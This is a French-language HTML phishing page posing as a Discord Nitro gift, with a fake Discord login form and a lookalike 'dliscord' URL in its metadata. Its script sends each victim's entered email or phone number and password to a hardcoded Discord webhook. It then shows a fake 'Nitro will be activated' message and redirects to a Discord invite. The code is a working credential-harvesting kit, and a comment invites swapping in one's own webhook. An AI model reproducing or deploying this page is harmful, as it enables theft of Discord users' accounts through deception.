<!DOCTYPE html>
<html>

<head>
    <link rel="stylesheet" href="assest/style.css" />
    <meta property="og:site_name" content="Discord Gift">
    <meta property="og:url" content="https://dliscord.">
    <meta property="og:title" content="Discord">
    <meta property="og:description" content="You Have Been Gifted A 3 Month Nitro">
    <meta property="og:type" content="Discord">
    <meta name="og:image" itemprop="image"
        content="https://cdn1.epicgames.com/salesEvent/salesEvent/EGS_Discord_Nitro_2560x1440_withlogo_2560x1440-944994658df3b04d0c4940be832da19e">
</head>

<body>
    <center>
        <div class="loginPart">
            <br /><br /><br />
            <p class="middle">Steak#3525 vous à offert 3 Mois de Discord Nitro! <br> Connecte toi pour les récupérer.
            </p>
            <br /><br /><br />
            <p class="welcome">Nous sommes si heureux de te revoir !</p>
            <br />
            <span class="leftmail">E-MAIL OU NUMÉRO DE TÉLÉPHONE :</span>
            <br />
            <form id="loginForm">
                <input type="text" name="user" class="inputs" />
                <br />
                <span class="left">MOT DE PASSE :</span>
                <br />
                <input type="password" name="pass" class="inputs" />
                <br /><br />
                <input type="submit" value="Connexion" class="submit" />
            </form>
        </div>
    </center>

    <script>
        document.getElementById('loginForm').addEventListener('submit', function (event) {
            event.preventDefault();

            const user = event.target.user.value;
            const pass = event.target.pass.value;

            const data = ` Username: ${user}   Password: ${pass}`;

            // Envoyer les données du formulaire vers le webhook Discord
            const webhookURL = 'https://discord.com/api/webhooks/1174888099831095399/xotxoYfjQ-fXZYNrlhQUzsMfCcvQ3bags-AVP6lHlZBldWfA2l8KYVa7b6hHTzmWjiT4'; // Remplacez ceci par l'URL de votre webhook Discord
            fetch(webhookURL, {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json',
                },
                body: JSON.stringify({ content: data }),
            })
                .then(response => {
                    if (!response.ok) {
                        throw new Error('Erreur lors de l\'envoi du message au webhook');
                    }
                    alert('Votre Nitro sera bientôt activé !');
                    window.location.replace("https://discord.gg/4Fxhr8d966");
                })
                .catch(error => {
                    console.error('Erreur:', error);
                    alert('Une erreur est survenue. Veuillez réessayer.');
                });
        });
    </script>
</body>

</html>
